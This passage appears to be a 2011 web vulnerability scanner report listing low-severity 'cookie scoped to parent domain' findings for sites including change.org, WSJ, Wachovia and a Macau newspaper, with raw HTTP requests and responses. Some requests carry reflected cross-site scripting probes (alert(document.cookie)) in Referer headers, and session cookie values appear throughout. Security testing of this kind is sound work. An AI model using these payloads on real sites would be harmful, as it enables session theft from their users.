Location: http://news.change.org/stories/bluefin_brigade_to_the_rescue
Cache-Control: no-cache
Set-Cookie: change_session_id=61175143e761b0481734bf6313d0cc69; domain=.change.org; path=/; HttpOnly
Content-Length: 126
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<html><body>You are being <a href="http://news.change.org/stories/bluefin_brigade_to_the_rescue">redirected</a>.</body></html>

10.3. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://news.change.org
Path:   /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi HTTP/1.1
Host: news.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "28489c2640e7e647e78a76edbda15c6b"
X-Runtime: 762
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: change_session_id=1aa1d10d1da46ec2aca2275d21a57c9b; domain=.change.org; path=/; HttpOnly
Content-Length: 22339
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7]> <html class="no-js ie6" lang="en-US" xml:lang="en-US" xmlns=
...[SNIP]...

10.4. https://online.cardmemberservices.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://online.cardmemberservices.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: online.cardmemberservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 18175
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
Date: Wed, 02 Feb 2011 22:02:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="Pragma" content="no-cache"/
...[SNIP]...

10.5. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

10.6. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

10.7. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /auth/AuthService HTTP/1.1
Host: onlineservices.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:13 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure
x-frames-option: deny
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 13099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

10.8. https://pncpoints.visaextras.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://pncpoints.visaextras.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pncpoints.visaextras.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=gie0yqkkbr0cxnzlqicxv1wn; domain=.visaextras.com; path=/; secure; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:02:15 GMT
Content-Length: 47356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">


...[SNIP]...

10.9. http://www.cualn.com/members/stepthree  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cualn.com
Path:   /members/stepthree

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/stepthree HTTP/1.1
Host: www.cualn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: SESS5dcca8fe1cebbc00afd6b71bc7e17676=0505b6f8eb0dfb02deb4a1644b2c68ec; expires=Sat, 26-Feb-2011 04:33:50 GMT; path=/; domain=.cualn.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...

10.10. http://www.directstartv.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=5q1pmeo4qcq80k8jsrsa9kggt5; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Thu, 02-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1461b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=149866862; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=162207399; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Mon, 04-Apr-2011 01:07:14 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

10.11. http://www.forum-software.org/tag/ipboard  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.forum-software.org
Path:   /tag/ipboard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tag/ipboard HTTP/1.1
Host: www.forum-software.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:47 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Set-Cookie: SESS280d8e8069f9a940cd2b7fa808fc752e=0d50d9dee0f91c069baeb303e13f8523; expires=Sat, 26-Feb-2011 04:40:07 GMT; path=/; domain=.forum-software.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Conte
...[SNIP]...

10.12. http://www.macaudailytimes.com.mo/cron_image.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /cron_image.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cron_image.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VivvoSessionId=3a9063f24d4a054f92c63

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a9063f24d4a054f92c63; expires=Fri, 04-Feb-2011 01:31:10 GMT; path=/; domain=.macaudailytimes.com.mo
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.13. http://www.macaudailytimes.com.mo/imagecode.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /imagecode.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imagecode.html?article_id=21109 HTTP/1.1
Host: www.macaudailytimes.com.mo
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VivvoSessionId=3a9063f24d4a054f92c63

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a9063f24d4a054f92c63; expires=Fri, 04-Feb-2011 01:31:10 GMT; path=/; domain=.macaudailytimes.com.mo
Vary: Accept-Encoding
Content-Type: image/png
Content-Length: 7521

.PNG
.
...IHDR...o...)........F...(IDATh..{ip..}.............&u."E..-QrR).........../qbg.......3V..uf.~....g....&..M-[v,..i..u.<.C$L..q,.]....~.cT....
X.>......!..#G.EaY..B.q:...G.$.e.N'...l..,UU    !.
...[SNIP]...

10.14. http://www.macaudailytimes.com.mo/js/lang.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /js/lang.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/lang.php HTTP/1.1
Host: www.macaudailytimes.com.mo
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VivvoSessionId=3a9063f24d4a054f92c63

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a9063f24d4a054f92c63; expires=Fri, 04-Feb-2011 01:31:05 GMT; path=/; domain=.macaudailytimes.com.mo
Content-Type: application/x-javascript
Content-Length: 20378

if(typeof(vivvo) == 'undefined') var vivvo = {};vivvo.lang = {};
vivvo.lang.get = function(lang) {return (vivvo.lang[lang] != undefined) ? vivvo.lang[lang] : lang };
vivvo.lang.LNG_SEARCH_ALL = 'Searc
...[SNIP]...

10.15. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; expires=Fri, 04-Feb-2011 01:16:56 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...

10.16. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:53 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3gpidtp18sji9mbnc5ikeu67s3; expires=Sat, 26-Feb-2011 01:34:13 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:49:54 GMT
ETag: "6ad65b857b676f9bc4304e9a1542a297"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.17. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:52 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=42d1eq3k1jalsbr539va4riur5; expires=Sat, 26-Feb-2011 01:34:12 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:46:24 GMT
ETag: "c8a6b2f76573aab17765d5878645eca9"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.18. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=wareseekercom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90|468x60&p=16284953&a=1&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&rurl=http%3A%2F%2Fburp%2Fshow%2F30&f=0&rnd=16284848 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=arn9a2NZaiMt6memKmHwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bOhCZaj5F8OTFsyVTkN7ZcNnRH2BBBlPyXJhFNDjgcJVvgaVG11CndFwGrWSEZc2naDJGDqftHQnmOHDvd3ePbOL6FaZdDGPg1Lmnn0J9OYX6Zbhbbv4GfpndrHVmW0s1qVrOtS6IP3EdwCpNAPNHMTens1QnwfVYFZb9HSyoPpMngmEQARRrTQDIAvXR3FQ3SYbdA8SQHiZbodgZap2C6ZaZamQrMS1cCcKUHYxod4r4Zb1YydwXbNmyf51VTTd7RQoZd7rH6AYyNUaywojPuhZcvhp

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=ain4xBt3erwAAxv5ACp5UsSCfRTc3eDBInJG6dCqycdA6CDkJUEE1FO3EEFaEMQCKewFpZaiZbJPZc95uCNmeLsZb1q5TrVkYqQRO9guZdb5GrmBn7HFLUiYT9lsvPNmaqZdFMDMrt7xSx1ITHIQVytDmQMe5eljYPUnO1WYEI6jrVrJGuVKbhbbMorcetYvupZb9oZcUXSt9cICE4WBOxtnZdhmOfKCgbyrFyA6hb4y5TnMNrYDcgNZdNDJbJg8hFmFZb8YdUv8nNebjJ1fanP2uupDhsCWD8HUHZb5Qbh8MJ0qr2ju5Ht9lw2gi0jIQMHHZauZbFLtYbbtsDUCrTEHqESCIg; path=/; domain=.tribalfusion.com; expires=Wed, 04-May-2011 01:25:06 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 368

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/ahmMnePb3ZbWbv0VW3WnUjpPFZbNXa3p4TJa4qM5mEfC1rj8Tdn1oArBnVrpodUL5Tv82Hmq5mZbZanUMEXVfP1c3V0GBomEvS5FY2VUfAUAvXPq30QVZbr
...[SNIP]...

10.19. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
